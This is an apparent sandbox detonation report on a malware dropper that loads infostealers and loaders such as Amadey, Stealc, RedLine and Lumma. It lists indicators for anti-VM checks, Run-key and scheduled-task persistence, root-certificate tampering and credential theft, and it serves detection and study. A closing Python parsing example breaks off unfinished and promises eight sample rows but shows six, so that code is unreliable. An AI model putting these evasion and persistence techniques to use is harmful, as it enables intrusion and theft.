Analysis Overview
SHA256
4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456
Threat Level: Known bad
The file 4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456 was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
ZharkBot
Stealc
CryptBot
RedLine
Amadey
RedLine payload
Detects ZharkBot payload
Lumma Stealer, LummaC
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Credentials from Password Stores: Credentials from Web Browsers
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Reads data files stored by FTP clients
Checks computer location settings
Checks BIOS information in registry
Unsecured Credentials: Credentials In Files
Drops startup file
Indirect Command Execution
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Identifies Wine through registry keys
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Enumerates processes with tasklist
Drops file in Windows directory
Program crash
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Enumerates system info in registry
Suspicious use of SendNotifyMessage
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Analysis: static1
Detonation Overview
Reported
2024-09-07 14:44
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-07 14:44
Reported
2024-09-07 14:46
Platform
win10v2004-20240802-en
Max time kernel
150s
Max time network
151s
Signatures
Amadey
CryptBot
Detects ZharkBot payload
Lumma Stealer, LummaC
RedLine
RedLine payload
Stealc
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3860 created 3468 | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | C:\Windows\Explorer.EXE |
| PID 3860 created 3468 | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | C:\Windows\Explorer.EXE |
ZharkBot
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000300001\runtime.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Lighter Tech\runtime.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\filename.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Indirect Command Execution
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Amadeus.exe = "C:\\Users\\Admin\\1000238002\\Amadeus.exe" | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Subsystem Framework = "\"C:\\ProgramData\\Microsoft Subsystem Framework\\winmsbt.exe\"" | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\ChipsCounted | C:\Users\Admin\AppData\Local\Temp\filename.exe | N/A |
| File opened for modification | C:\Windows\MaximizeRepresentative | C:\Users\Admin\AppData\Local\Temp\filename.exe | N/A |
| File opened for modification | C:\Windows\ChristmasHerbal | C:\Users\Admin\AppData\Local\Temp\filename.exe | N/A |
| File opened for modification | C:\Windows\LadySquare | C:\Users\Admin\AppData\Local\Temp\filename.exe | N/A |
| File opened for modification | C:\Windows\PrerequisiteCents | C:\Users\Admin\AppData\Local\Temp\filename.exe | N/A |
| File created | C:\Windows\Tasks\bDxiLwhXhHymEtvbIE.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\1000238002\Amadeus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\tFtzeaz0BT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\egKXRnvmfw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\07DD4GXsP3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSA469.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\NPqcpcuVNB.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = [certificate blob omitted] | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
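The signature tables above are raw per-event telemetry. The script below is an added example by the editor, not part of the sandbox report: it parses rows in the report's own pipe-table layout and groups the matches by the technique they evidence, so an analyst can separate the anti-VM probes, persistence writes and root-store tampering from noise such as the NLS\Language reads. The eight rows embedded in it are copied from the tables above as a constructed sample, and the ATT&CK technique IDs in the rule set are the editor's own mapping (the report names techniques but gives no IDs).

```python
import re
from dataclasses import dataclass

# Constructed sample: eight event rows copied from this report's signature tables
# (Description | Indicator | Process | Target). Not a live feed.
SAMPLE_ROWS = r"""
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Amadeus.exe = "C:\\Users\\Admin\\1000238002\\Amadeus.exe" | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe | N/A |
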